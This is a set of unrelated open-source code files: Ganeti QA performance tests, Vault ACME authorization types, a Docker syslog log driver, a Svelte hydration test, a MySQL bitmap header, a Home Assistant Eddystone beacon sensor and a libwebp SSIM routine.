"-B", "%s=%s" % (constants.BE_MINMEM, new_min_mem)])
cmd.append(instance.name)
job_driver.AddJob(_ExecuteJobSubmittingCmd(cmd))
job_driver.WaitForCompletion()
def TestParallelInstanceOSOperations(instances):
"""PERFORMANCE: Parallel instance OS operations.
Note: This test leaves the instances either running or stopped, there's no
guarantee on the actual status.
@type instances: list of L{qa_config._QaInstance}
@param instances: list of instances to issue lifecycle commands against
"""
OPS = ["start", "shutdown", "reboot", "reinstall"]
job_driver = _JobQueueDriver()
def _SubmitNextOperation(instance, start, idx, job_driver, _):
if idx == len(OPS):
return
op_idx = (start + idx) % len(OPS)
next_fn = functools.partial(_SubmitNextOperation, instance, start, idx + 1)
if OPS[op_idx] == "reinstall" and \
instance.disk_template == constants.DT_DISKLESS:
# no reinstall possible with diskless instances
next_fn(job_driver, None)
return
elif OPS[op_idx] == "reinstall":
# the instance has to be shut down for reinstall to work
shutdown_cmd = ["gnt-instance", "shutdown", "--submit", instance.name]
cmd = ["gnt-instance", "reinstall", "--submit", "-f", instance.name]
job_driver.AddJob(_ExecuteJobSubmittingCmd(shutdown_cmd),
running_fn=lambda _, __: job_driver.AddJob(
_ExecuteJobSubmittingCmd(cmd),
running_fn=next_fn))
else:
cmd = ["gnt-instance", OPS[op_idx], "--submit"]
if OPS[op_idx] == "reinstall":
cmd.append("-f")
cmd.append(instance.name)
job_id = _ExecuteJobSubmittingCmd(cmd)
job_driver.AddJob(job_id, running_fn=next_fn)
for start, instance in enumerate(instances):
_SubmitNextOperation(instance, start % len(OPS), 0, job_driver, None)
job_driver.WaitForCompletion()
def TestParallelInstanceQueries(instances):
"""PERFORMANCE: Parallel instance queries.
@type instances: list of L{qa_config._QaInstance}
@param instances: list of instances to issue queries against
"""
threads = qa_job_utils.QAThreadGroup()
for instance in instances:
cmd = ["gnt-instance", "info", instance.name]
info_thread = qa_job_utils.QAThread(qa_utils.AssertCommand, [cmd], {})
threads.Start(info_thread)
cmd = ["gnt-instance", "list"]
list_thread = qa_job_utils.QAThread(qa_utils.AssertCommand, [cmd], {})
threads.Start(list_thread)
threads.JoinAndReraise()
def TestJobQueueSubmissionPerformance():
"""PERFORMANCE: Job queue submission performance.
This test exercises the job queue and verifies that the job submission time
does not increase as more jobs are added.
"""
MAX_CLUSTER_INFO_SECONDS = 15.0
job_driver = _JobQueueDriver()
submission_durations = []
def _VerifySubmissionDuration(duration_seconds):
# only start to verify the submission duration once we got data from the
# first 10 job submissions
if len(submission_durations) >= 10:
avg_duration = sum(submission_durations) / len(submission_durations)
max_duration = avg_duration * 1.5
if duration_seconds > max_duration:
print(qa_logging.FormatWarning(
"Submitting a delay job took %f seconds, max %f expected" %
(duration_seconds, max_duration)))
else:
submission_durations.append(duration_seconds)
def _SubmitDelayJob(count):
for _ in range(count):
cmd = ["gnt-debug", "delay", "--submit", "0.1"]
start = datetime.datetime.now()
job_id = _ExecuteJobSubmittingCmd(cmd)
duration_seconds = \
qa_utils.TimedeltaToTotalSeconds(datetime.datetime.now() - start)
_VerifySubmissionDuration(duration_seconds)
job_driver.AddJob(job_id)
threads = qa_job_utils.QAThreadGroup()
for _ in range(10):
thread = qa_job_utils.QAThread(_SubmitDelayJob, [20], {})
threads.Start(thread)
threads.JoinAndReraise()
qa_utils.AssertCommand(["gnt-cluster", "info"],
max_seconds=MAX_CLUSTER_INFO_SECONDS)
job_driver.WaitForCompletion()
def TestParallelDRBDInstanceCreationPerformance():
"""PERFORMANCE: Parallel DRBD backed instance creation.
"""
assert qa_config.IsTemplateSupported(constants.DT_DRBD8)
nodes = list(_AcquireAllNodes())
_TestParallelInstanceCreationAndRemoval(max_instances=len(nodes) * 2,
disk_template=constants.DT_DRBD8)
qa_config.ReleaseManyNodes(nodes)
def TestParallelPlainInstanceCreationPerformance():
"""PERFORMANCE: Parallel plain backed instance creation.
"""
assert qa_config.IsTemplateSupported(constants.DT_PLAIN)
nodes = list(_AcquireAllNodes())
_TestParallelInstanceCreationAndRemoval(max_instances=len(nodes) * 2,
disk_template=constants.DT_PLAIN)
qa_config.ReleaseManyNodes(nodes)
def _TestInstanceOperationInParallelToInstanceCreation(*cmds):
"""Run the given test command in parallel to an instance creation.
@type cmds: list of list of strings
@param cmds: commands to execute in parallel to an instance creation. Each
command in the list is executed once the previous job starts
to run.
"""
def _SubmitNextCommand(cmd_idx, job_driver, _):
if cmd_idx >= len(cmds):
return
job_id = _ExecuteJobSubmittingCmd(cmds[cmd_idx])
job_driver.AddJob(
job_id, success_fn=functools.partial(_SubmitNextCommand, cmd_idx + 1))
assert qa_config.IsTemplateSupported(constants.DT_DRBD8)
assert len(cmds) > 0
job_driver = _JobQueueDriver()
_SubmitNextCommand(0, job_driver, None)
_TestParallelInstanceCreationAndRemoval(max_instances=1,
disk_template=constants.DT_DRBD8,
custom_job_driver=job_driver)
job_driver.WaitForCompletion()
def TestParallelInstanceFailover(instance):
"""PERFORMANCE: Instance failover with parallel instance creation.
"""
_TestInstanceOperationInParallelToInstanceCreation(
["gnt-instance", "failover", "--submit", "-f", "--shutdown-timeout=0",
instance.name])
def TestParallelInstanceMigration(instance):
"""PERFORMANCE: Instance migration with parallel instance creation.
"""
_TestInstanceOperationInParallelToInstanceCreation(
["gnt-instance", "migrate", "--submit", "-f", instance.name])
def TestParallelInstanceReplaceDisks(instance):
"""PERFORMANCE: Instance replace-disks with parallel instance creation.
"""
_TestInstanceOperationInParallelToInstanceCreation(
["gnt-instance", "replace-disks", "--submit", "--early-release", "-p",
instance.name])
def TestParallelInstanceReboot(instance):
"""PERFORMANCE: Instance reboot with parallel instance creation.
"""
_TestInstanceOperationInParallelToInstanceCreation(
["gnt-instance", "reboot", "--submit", instance.name])
def TestParallelInstanceReinstall(instance):
"""PERFORMANCE: Instance reinstall with parallel instance creation.
"""
# instance reinstall requires the instance to be down
qa_utils.AssertCommand(["gnt-instance", "stop", instance.name])
_TestInstanceOperationInParallelToInstanceCreation(
["gnt-instance", "reinstall", "--submit", "-f", instance.name])
qa_utils.AssertCommand(["gnt-instance", "start", instance.name])
def TestParallelInstanceRename(instance):
"""PERFORMANCE: Instance rename with parallel instance creation.
"""
# instance rename requires the instance to be down
qa_utils.AssertCommand(["gnt-instance", "stop", instance.name])
new_instance = qa_config.AcquireInstance()
try:
_TestInstanceOperationInParallelToInstanceCreation(
["gnt-instance", "rename", "--submit", instance.name, new_instance.name],
["gnt-instance", "rename", "--submit", new_instance.name, instance.name])
finally:
new_instance.Release()
qa_utils.AssertCommand(["gnt-instance", "start", instance.name]) | unknown | codeparrot/codeparrot-clean | ||
// Copyright IBM Corp. 2016, 2025
// SPDX-License-Identifier: BUSL-1.1
package pki
import (
"fmt"
"time"
)
type ACMEIdentifierType string
const (
ACMEDNSIdentifier ACMEIdentifierType = "dns"
ACMEIPIdentifier ACMEIdentifierType = "ip"
)
type ACMEIdentifier struct {
Type ACMEIdentifierType `json:"type"`
Value string `json:"value"`
OriginalValue string `json:"original_value"`
IsWildcard bool `json:"is_wildcard"`
IsV6IP bool `json:"is_v6_ip"`
}
func (ai *ACMEIdentifier) MaybeParseWildcard() (bool, string, error) {
if ai.Type != ACMEDNSIdentifier || !isWildcardDomain(ai.Value) {
return false, ai.Value, nil
}
// Here on out, technically it is a wildcard.
ai.IsWildcard = true
wildcardLabel, reducedName, err := validateWildcardDomain(ai.Value)
if err != nil {
return true, "", err
}
if wildcardLabel != "*" {
// Per RFC 8555 Section. 7.1.3. Order Objects:
//
// > Any identifier of type "dns" in a newOrder request MAY have a
// > wildcard domain name as its value. A wildcard domain name consists
// > of a single asterisk character followed by a single full stop
// > character ("*.") followed by a domain name as defined for use in the
// > Subject Alternate Name Extension by [RFC5280].
return true, "", fmt.Errorf("wildcard must be entire left-most label")
}
if reducedName == "" {
return true, "", fmt.Errorf("wildcard must not be entire domain name; need at least two domain labels")
}
// Parsing was indeed successful, so update our reduced name.
ai.Value = reducedName
return true, reducedName, nil
}
func (ai *ACMEIdentifier) NetworkMarshal(useOriginalValue bool) map[string]interface{} {
value := ai.OriginalValue
if !useOriginalValue {
value = ai.Value
}
return map[string]interface{}{
"type": ai.Type,
"value": value,
}
}
type ACMEAuthorizationStatusType string
const (
ACMEAuthorizationPending ACMEAuthorizationStatusType = "pending"
ACMEAuthorizationValid ACMEAuthorizationStatusType = "valid"
ACMEAuthorizationInvalid ACMEAuthorizationStatusType = "invalid"
ACMEAuthorizationDeactivated ACMEAuthorizationStatusType = "deactivated"
ACMEAuthorizationExpired ACMEAuthorizationStatusType = "expired"
ACMEAuthorizationRevoked ACMEAuthorizationStatusType = "revoked"
)
type ACMEOrderStatusType string
const (
ACMEOrderPending ACMEOrderStatusType = "pending"
ACMEOrderProcessing ACMEOrderStatusType = "processing"
ACMEOrderValid ACMEOrderStatusType = "valid"
ACMEOrderInvalid ACMEOrderStatusType = "invalid"
ACMEOrderReady ACMEOrderStatusType = "ready"
)
type ACMEChallengeType string
const (
ACMEHTTPChallenge ACMEChallengeType = "http-01"
ACMEDNSChallenge ACMEChallengeType = "dns-01"
ACMEALPNChallenge ACMEChallengeType = "tls-alpn-01"
)
type ACMEChallengeStatusType string
const (
ACMEChallengePending ACMEChallengeStatusType = "pending"
ACMEChallengeProcessing ACMEChallengeStatusType = "processing"
ACMEChallengeValid ACMEChallengeStatusType = "valid"
ACMEChallengeInvalid ACMEChallengeStatusType = "invalid"
)
type ACMEChallenge struct {
Type ACMEChallengeType `json:"type"`
Status ACMEChallengeStatusType `json:"status"`
Validated string `json:"validated,optional"`
Error map[string]interface{} `json:"error,optional"`
ChallengeFields map[string]interface{} `json:"challenge_fields"`
}
func (ac *ACMEChallenge) NetworkMarshal(acmeCtx *acmeContext, authId string) map[string]interface{} {
resp := map[string]interface{}{
"type": ac.Type,
"url": buildChallengeUrl(acmeCtx, authId, string(ac.Type)),
"status": ac.Status,
}
if ac.Validated != "" {
resp["validated"] = ac.Validated
}
if len(ac.Error) > 0 {
resp["error"] = ac.Error
}
for field, value := range ac.ChallengeFields {
resp[field] = value
}
return resp
}
func buildChallengeUrl(acmeCtx *acmeContext, authId, challengeType string) string {
return acmeCtx.baseUrl.JoinPath("/challenge/", authId, challengeType).String()
}
type ACMEAuthorization struct {
Id string `json:"id"`
AccountId string `json:"account_id"`
Identifier *ACMEIdentifier `json:"identifier"`
Status ACMEAuthorizationStatusType `json:"status"`
// Per RFC 8555 Section 7.1.4. Authorization Objects:
//
// > This field is REQUIRED for objects with "valid" in the "status"
// > field.
Expires string `json:"expires,optional"`
Challenges []*ACMEChallenge `json:"challenges"`
Wildcard bool `json:"wildcard"`
}
func (aa *ACMEAuthorization) GetExpires() (time.Time, error) {
if aa.Expires == "" {
return time.Time{}, nil
}
return time.Parse(time.RFC3339, aa.Expires)
}
func (aa *ACMEAuthorization) NetworkMarshal(acmeCtx *acmeContext) map[string]interface{} {
resp := map[string]interface{}{
"identifier": aa.Identifier.NetworkMarshal( /* use value, not original value */ false),
"status": aa.Status,
"wildcard": aa.Wildcard,
}
if aa.Expires != "" {
resp["expires"] = aa.Expires
}
if len(aa.Challenges) > 0 {
challenges := []map[string]interface{}{}
for _, challenge := range aa.Challenges {
challenges = append(challenges, challenge.NetworkMarshal(acmeCtx, aa.Id))
}
resp["challenges"] = challenges
}
return resp
} | go | github | https://github.com/hashicorp/vault | builtin/logical/pki/acme_authorizations.go |
// Package syslog provides the logdriver for forwarding server logs to syslog endpoints.
package syslog
import (
"crypto/tls"
"errors"
"fmt"
"net"
"net/url"
"os"
"strconv"
"strings"
"time"
syslog "github.com/RackSec/srslog"
"github.com/docker/go-connections/tlsconfig"
"github.com/moby/moby/v2/daemon/logger"
"github.com/moby/moby/v2/daemon/logger/loggerutils"
)
const (
name = "syslog"
secureProto = "tcp+tls"
defaultPort = "514"
)
var facilities = map[string]syslog.Priority{
"kern": syslog.LOG_KERN,
"user": syslog.LOG_USER,
"mail": syslog.LOG_MAIL,
"daemon": syslog.LOG_DAEMON,
"auth": syslog.LOG_AUTH,
"syslog": syslog.LOG_SYSLOG,
"lpr": syslog.LOG_LPR,
"news": syslog.LOG_NEWS,
"uucp": syslog.LOG_UUCP,
"cron": syslog.LOG_CRON,
"authpriv": syslog.LOG_AUTHPRIV,
"ftp": syslog.LOG_FTP,
"local0": syslog.LOG_LOCAL0,
"local1": syslog.LOG_LOCAL1,
"local2": syslog.LOG_LOCAL2,
"local3": syslog.LOG_LOCAL3,
"local4": syslog.LOG_LOCAL4,
"local5": syslog.LOG_LOCAL5,
"local6": syslog.LOG_LOCAL6,
"local7": syslog.LOG_LOCAL7,
}
type syslogger struct {
writer *syslog.Writer
}
func init() {
if err := logger.RegisterLogDriver(name, New); err != nil {
panic(err)
}
if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil {
panic(err)
}
}
// rsyslog uses appname part of syslog message to fill in an %syslogtag% template
// attribute in rsyslog.conf. In order to be backward compatible to rfc3164
// tag will be also used as an appname
func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
timestamp := time.Now().Format(time.RFC3339)
pid := os.Getpid()
msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s",
p, 1, timestamp, hostname, tag, pid, tag, content)
return msg
}
// The timestamp field in rfc5424 is derived from rfc3339. Whereas rfc3339 makes allowances
// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximum
// resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution)
func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
timestamp := time.Now().Format("2006-01-02T15:04:05.000000Z07:00")
pid := os.Getpid()
msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s",
p, 1, timestamp, hostname, tag, pid, tag, content)
return msg
}
// New creates a syslog logger using the configuration passed in on
// the context. Supported context configuration variables are
// syslog-address, syslog-facility, syslog-format.
func New(info logger.Info) (logger.Logger, error) {
tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
if err != nil {
return nil, err
}
proto, address, err := parseAddress(info.Config["syslog-address"])
if err != nil {
return nil, err
}
facility, err := parseFacility(info.Config["syslog-facility"])
if err != nil {
return nil, err
}
syslogFormatter, syslogFramer, err := parseLogFormat(info.Config["syslog-format"], proto)
if err != nil {
return nil, err
}
var log *syslog.Writer
if proto == secureProto {
tlsConfig, tlsErr := parseTLSConfig(info.Config)
if tlsErr != nil {
return nil, tlsErr
}
log, err = syslog.DialWithTLSConfig(proto, address, facility, tag, tlsConfig)
} else {
log, err = syslog.Dial(proto, address, facility, tag)
}
if err != nil {
return nil, err
}
log.SetFormatter(syslogFormatter)
log.SetFramer(syslogFramer)
return &syslogger{
writer: log,
}, nil
}
func (s *syslogger) Log(msg *logger.Message) error {
if len(msg.Line) == 0 {
return nil
}
line := string(msg.Line)
source := msg.Source
logger.PutMessage(msg)
if source == "stderr" {
return s.writer.Err(line)
}
return s.writer.Info(line)
}
func (s *syslogger) Close() error {
return s.writer.Close()
}
func (s *syslogger) Name() string {
return name
}
func parseAddress(address string) (string, string, error) {
if address == "" {
return "", "", nil
}
addr, err := url.Parse(address)
if err != nil {
return "", "", err
}
// unix and unixgram socket validation
if addr.Scheme == "unix" || addr.Scheme == "unixgram" {
if _, err := os.Stat(addr.Path); err != nil {
return "", "", err
}
return addr.Scheme, addr.Path, nil
}
if addr.Scheme != "udp" && addr.Scheme != "tcp" && addr.Scheme != secureProto {
return "", "", fmt.Errorf("unsupported scheme: '%s'", addr.Scheme)
}
// here we process tcp|udp
host := addr.Host
if _, _, err := net.SplitHostPort(host); err != nil {
if !strings.Contains(err.Error(), "missing port in address") {
return "", "", err
}
host = net.JoinHostPort(host, defaultPort)
}
return addr.Scheme, host, nil
}
// ValidateLogOpt looks for syslog specific log options
// syslog-address, syslog-facility.
func ValidateLogOpt(cfg map[string]string) error {
for key := range cfg {
switch key {
case "env":
case "env-regex":
case "labels":
case "labels-regex":
case "syslog-address":
case "syslog-facility":
case "syslog-tls-ca-cert":
case "syslog-tls-cert":
case "syslog-tls-key":
case "syslog-tls-skip-verify":
case "tag":
case "syslog-format":
default:
return fmt.Errorf("unknown log opt '%s' for syslog log driver", key)
}
}
if _, _, err := parseAddress(cfg["syslog-address"]); err != nil {
return err
}
if _, err := parseFacility(cfg["syslog-facility"]); err != nil {
return err
}
if _, _, err := parseLogFormat(cfg["syslog-format"], ""); err != nil {
return err
}
return nil
}
func parseFacility(facility string) (syslog.Priority, error) {
if facility == "" {
return syslog.LOG_DAEMON, nil
}
if syslogFacility, valid := facilities[facility]; valid {
return syslogFacility, nil
}
fInt, err := strconv.Atoi(facility)
if err == nil && 0 <= fInt && fInt <= 23 {
return syslog.Priority(fInt << 3), nil
}
return syslog.Priority(0), errors.New("invalid syslog facility")
}
func parseTLSConfig(cfg map[string]string) (*tls.Config, error) {
_, skipVerify := cfg["syslog-tls-skip-verify"]
opts := tlsconfig.Options{
CAFile: cfg["syslog-tls-ca-cert"],
CertFile: cfg["syslog-tls-cert"],
KeyFile: cfg["syslog-tls-key"],
InsecureSkipVerify: skipVerify,
}
return tlsconfig.Client(opts)
}
func parseLogFormat(logFormat, proto string) (syslog.Formatter, syslog.Framer, error) {
switch logFormat {
case "":
return syslog.UnixFormatter, syslog.DefaultFramer, nil
case "rfc3164":
return syslog.RFC3164Formatter, syslog.DefaultFramer, nil
case "rfc5424":
if proto == secureProto {
return rfc5424formatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil
}
return rfc5424formatterWithAppNameAsTag, syslog.DefaultFramer, nil
case "rfc5424micro":
if proto == secureProto {
return rfc5424microformatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil
}
return rfc5424microformatterWithAppNameAsTag, syslog.DefaultFramer, nil
default:
return nil, nil, errors.New("Invalid syslog format")
}
} | go | github | https://github.com/moby/moby | daemon/logger/syslog/syslog.go |
import { test } from '../../test';
export default test({
// This test verifies that completely static select with rich option content
// hydrates correctly and the content is preserved
snapshot(target) {
const select = target.querySelector('select');
const options = target.querySelectorAll('option');
return {
select,
option1: options[0],
option2: options[1],
option3: options[2]
};
},
async test(assert, target) {
const options = target.querySelectorAll('option');
// Verify the rich content is present in the options
assert.equal(options[0]?.textContent, 'Bold Option');
assert.equal(options[1]?.textContent, 'Italic Option');
assert.equal(options[2]?.textContent, 'Plain Option');
// Check that the rich elements are actually there (on supporting browsers)
const strong = options[0]?.querySelector('strong');
const em = options[1]?.querySelector('em');
// These may or may not exist depending on browser support
// but the text content should always be correct
if (strong) {
assert.equal(strong.textContent, 'Bold');
}
if (em) {
assert.equal(em.textContent, 'Italic');
}
}
}); | javascript | github | https://github.com/sveltejs/svelte | packages/svelte/tests/hydration/samples/option-rich-content-static/_config.js |
/*
Copyright (c) 2001, 2025, Oracle and/or its affiliates.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License, version 2.0,
as published by the Free Software Foundation.
This program is designed to work with certain software (including
but not limited to OpenSSL) that is licensed under separate terms,
as designated in a particular file or component or in included license
documentation. The authors of MySQL hereby grant you an additional
permission to link the program and your derivative works with the
separately licensed software that they have either included with
the program or referenced in the documentation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License, version 2.0, for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */
#ifndef MY_BITMAP_INCLUDED
#define MY_BITMAP_INCLUDED
/**
@file include/my_bitmap.h
*/
#define MY_BIT_NONE (~(uint)0)
#include <assert.h>
#include <limits.h>
#include <string.h>
#include <sys/types.h>
#include "my_inttypes.h"
typedef uint32 my_bitmap_map;
struct MY_BITMAP {
my_bitmap_map *bitmap{nullptr};
uint n_bits{0}; /* number of bits occupied by the above */
my_bitmap_map last_word_mask{0};
my_bitmap_map *last_word_ptr{nullptr};
};
extern void create_last_word_mask(MY_BITMAP *map);
extern bool bitmap_init(MY_BITMAP *map, my_bitmap_map *buf, uint n_bits);
extern bool bitmap_is_clear_all(const MY_BITMAP *map);
extern bool bitmap_is_prefix(const MY_BITMAP *map, uint prefix_size);
extern bool bitmap_is_set_all(const MY_BITMAP *map);
extern bool bitmap_is_subset(const MY_BITMAP *map1, const MY_BITMAP *map2);
extern bool bitmap_is_overlapping(const MY_BITMAP *map1, const MY_BITMAP *map2);
extern bool bitmap_is_valid(const MY_BITMAP *map);
extern bool bitmap_test_and_set(MY_BITMAP *map, uint bitmap_bit);
extern uint bitmap_set_next(MY_BITMAP *map);
extern uint bitmap_get_first(const MY_BITMAP *map);
extern uint bitmap_get_first_set(const MY_BITMAP *map);
extern uint bitmap_get_next_set(const MY_BITMAP *map, uint bitmap_bit);
extern uint bitmap_bits_set(const MY_BITMAP *map);
extern void bitmap_free(MY_BITMAP *map);
extern void bitmap_set_above(MY_BITMAP *map, uint from_byte, bool use_bit);
extern void bitmap_set_prefix(MY_BITMAP *map, uint prefix_size);
extern void bitmap_intersect(MY_BITMAP *to, const MY_BITMAP *from);
extern void bitmap_subtract(MY_BITMAP *map, const MY_BITMAP *map2);
extern void bitmap_union(MY_BITMAP *map, const MY_BITMAP *map2);
extern void bitmap_xor(MY_BITMAP *map, const MY_BITMAP *map2);
extern void bitmap_invert(MY_BITMAP *map);
extern void bitmap_copy(MY_BITMAP *map, const MY_BITMAP *map2);
extern uint bitmap_n_copy(MY_BITMAP *dst, const MY_BITMAP *src,
uint max_bits_to_copy = UINT_MAX);
#define bitmap_buffer_size(bits) (((bits) + 31) / 32) * 4
#define no_bytes_in_map(map) (((map)->n_bits + 7) / 8)
#define no_words_in_map(map) (((map)->n_bits + 31) / 32)
static inline void bitmap_set_bit(MY_BITMAP *map, uint bit) {
assert(bit < map->n_bits);
((uchar *)map->bitmap)[bit / 8] |= (1 << (bit & 7));
}
static inline void bitmap_flip_bit(MY_BITMAP *map, uint bit) {
assert(bit < map->n_bits);
((uchar *)map->bitmap)[bit / 8] ^= (1 << (bit & 7));
}
static inline void bitmap_clear_bit(MY_BITMAP *map, uint bit) {
assert(bit < map->n_bits);
((uchar *)map->bitmap)[bit / 8] &= ~(1 << (bit & 7));
}
static inline bool bitmap_is_set(const MY_BITMAP *map, uint bit) {
assert(bit < map->n_bits);
return ((uchar *)map->bitmap)[bit / 8] & (1 << (bit & 7));
}
/**
Quite unlike other C comparison functions ending with 'cmp', e.g. memcmp(),
strcmp(), this function returns true if the bitmaps are equal, and false
otherwise.
@retval true The bitmaps are equal.
@retval false The bitmaps differ.
*/
static inline bool bitmap_cmp(const MY_BITMAP *map1, const MY_BITMAP *map2) {
assert(map1->n_bits > 0);
assert(map2->n_bits > 0);
if (memcmp(map1->bitmap, map2->bitmap, 4 * (no_words_in_map(map1) - 1)) != 0)
return false;
return ((*map1->last_word_ptr | map1->last_word_mask) ==
(*map2->last_word_ptr | map2->last_word_mask));
}
/*
Clears all bits. This is allowed even for a zero-size bitmap.
*/
static inline void bitmap_clear_all(MY_BITMAP *map) {
memset(map->bitmap, 0, 4 * no_words_in_map(map));
}
/*
Sets all bits. This is allowed even for a zero-size bitmap.
*/
static inline void bitmap_set_all(MY_BITMAP *map) {
memset(map->bitmap, 0xFF, 4 * no_words_in_map(map));
}
#endif // MY_BITMAP_INCLUDED | c | github | https://github.com/mysql/mysql-server | include/my_bitmap.h |
"""
Read temperature information from Eddystone beacons.
Your beacons must be configured to transmit UID (for identification) and TLM
(for temperature) frames.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.eddystone_temperature/
"""
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME, TEMP_CELSIUS, STATE_UNKNOWN, EVENT_HOMEASSISTANT_STOP,
EVENT_HOMEASSISTANT_START)
REQUIREMENTS = ['beacontools[scan]==1.0.1']
_LOGGER = logging.getLogger(__name__)
CONF_BEACONS = 'beacons'
CONF_BT_DEVICE_ID = 'bt_device_id'
CONF_INSTANCE = 'instance'
CONF_NAMESPACE = 'namespace'
BEACON_SCHEMA = vol.Schema({
vol.Required(CONF_NAMESPACE): cv.string,
vol.Required(CONF_INSTANCE): cv.string,
vol.Optional(CONF_NAME): cv.string
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_BT_DEVICE_ID, default=0): cv.positive_int,
vol.Required(CONF_BEACONS): vol.Schema({cv.string: BEACON_SCHEMA}),
})
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Validate configuration, create devices and start monitoring thread."""
bt_device_id = config.get("bt_device_id")
beacons = config.get("beacons")
devices = []
for dev_name, properties in beacons.items():
namespace = get_from_conf(properties, "namespace", 20)
instance = get_from_conf(properties, "instance", 12)
name = properties.get(CONF_NAME, dev_name)
if instance is None or namespace is None:
_LOGGER.error("Skipping %s", dev_name)
continue
else:
devices.append(EddystoneTemp(name, namespace, instance))
if devices:
mon = Monitor(hass, devices, bt_device_id)
def monitor_stop(_service_or_event):
"""Stop the monitor thread."""
_LOGGER.info("Stopping scanner for Eddystone beacons")
mon.stop()
def monitor_start(_service_or_event):
"""Start the monitor thread."""
_LOGGER.info("Starting scanner for Eddystone beacons")
mon.start()
add_devices(devices)
mon.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, monitor_stop)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, monitor_start)
else:
_LOGGER.warning("No devices were added")
def get_from_conf(config, config_key, length):
"""Retrieve value from config and validate length."""
string = config.get(config_key)
if len(string) != length:
_LOGGER.error("Error in config parameter %s: Must be exactly %d "
"bytes. Device will not be added", config_key, length/2)
return None
else:
return string
class EddystoneTemp(Entity):
"""Representation of a temperature sensor."""
def __init__(self, name, namespace, instance):
"""Initialize a sensor."""
self._name = name
self.namespace = namespace
self.instance = instance
self.bt_addr = None
self.temperature = STATE_UNKNOWN
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self.temperature
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return TEMP_CELSIUS
@property
def should_poll(self):
"""Return the polling state."""
return False
class Monitor(object):
"""Continously scan for BLE advertisements."""
def __init__(self, hass, devices, bt_device_id):
"""Construct interface object."""
self.hass = hass
# List of beacons to monitor
self.devices = devices
# Number of the bt device (hciX)
self.bt_device_id = bt_device_id
def callback(bt_addr, _, packet, additional_info):
"""Handle new packets."""
self.process_packet(
additional_info['namespace'], additional_info['instance'],
packet.temperature)
# pylint: disable=import-error
from beacontools import (
BeaconScanner, EddystoneFilter, EddystoneTLMFrame)
device_filters = [EddystoneFilter(d.namespace, d.instance)
for d in devices]
self.scanner = BeaconScanner(
callback, bt_device_id, device_filters, EddystoneTLMFrame)
self.scanning = False
def start(self):
"""Continously scan for BLE advertisements."""
if not self.scanning:
self.scanner.start()
self.scanning = True
else:
_LOGGER.debug(
"start() called, but scanner is already running")
def process_packet(self, namespace, instance, temperature):
"""Assign temperature to device."""
_LOGGER.debug("Received temperature for <%s,%s>: %d",
namespace, instance, temperature)
for dev in self.devices:
if dev.namespace == namespace and dev.instance == instance:
if dev.temperature != temperature:
dev.temperature = temperature
dev.schedule_update_ha_state()
def stop(self):
"""Signal runner to stop and join thread."""
if self.scanning:
_LOGGER.debug("Stopping...")
self.scanner.stop()
_LOGGER.debug("Stopped")
self.scanning = False
else:
_LOGGER.debug(
"stop() called but scanner was not running") | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2017 Google Inc. All Rights Reserved.
//
// Use of this source code is governed by a BSD-style license
// that can be found in the COPYING file in the root of the source
// tree. An additional intellectual property rights grant can be found
// in the file PATENTS. All contributing project authors may
// be found in the AUTHORS file in the root of the source tree.
// -----------------------------------------------------------------------------
//
// distortion calculation
//
// Author: Skal (pascal.massimino@gmail.com)
#include <assert.h>
#include <stdlib.h> // for abs()
#include "src/dsp/cpu.h"
#include "src/dsp/dsp.h"
#include "src/webp/types.h"
#if !defined(WEBP_REDUCE_SIZE)
//------------------------------------------------------------------------------
// SSIM / PSNR
// hat-shaped filter. Sum of coefficients is equal to 16.
static const uint32_t kWeight[2 * VP8_SSIM_KERNEL + 1] = {
1, 2, 3, 4, 3, 2, 1
};
static const uint32_t kWeightSum = 16 * 16; // sum{kWeight}^2
static WEBP_INLINE double SSIMCalculation(
const VP8DistoStats* const stats, uint32_t N /*num samples*/) {
const uint32_t w2 = N * N;
const uint32_t C1 = 20 * w2;
const uint32_t C2 = 60 * w2;
const uint32_t C3 = 8 * 8 * w2; // 'dark' limit ~= 6
const uint64_t xmxm = (uint64_t)stats->xm * stats->xm;
const uint64_t ymym = (uint64_t)stats->ym * stats->ym;
if (xmxm + ymym >= C3) {
const int64_t xmym = (int64_t)stats->xm * stats->ym;
const int64_t sxy = (int64_t)stats->xym * N - xmym; // can be negative
const uint64_t sxx = (uint64_t)stats->xxm * N - xmxm;
const uint64_t syy = (uint64_t)stats->yym * N - ymym;
// we descale by 8 to prevent overflow during the fnum/fden multiply.
const uint64_t num_S = (2 * (uint64_t)(sxy < 0 ? 0 : sxy) + C2) >> 8;
const uint64_t den_S = (sxx + syy + C2) >> 8;
const uint64_t fnum = (2 * xmym + C1) * num_S;
const uint64_t fden = (xmxm + ymym + C1) * den_S;
const double r = (double)fnum / fden;
assert(r >= 0. && r <= 1.0);
return r;
}
return 1.; // area is too dark to contribute meaningfully
}
double VP8SSIMFromStats(const VP8DistoStats* const stats) {
return SSIMCalculation(stats, kWeightSum);
}
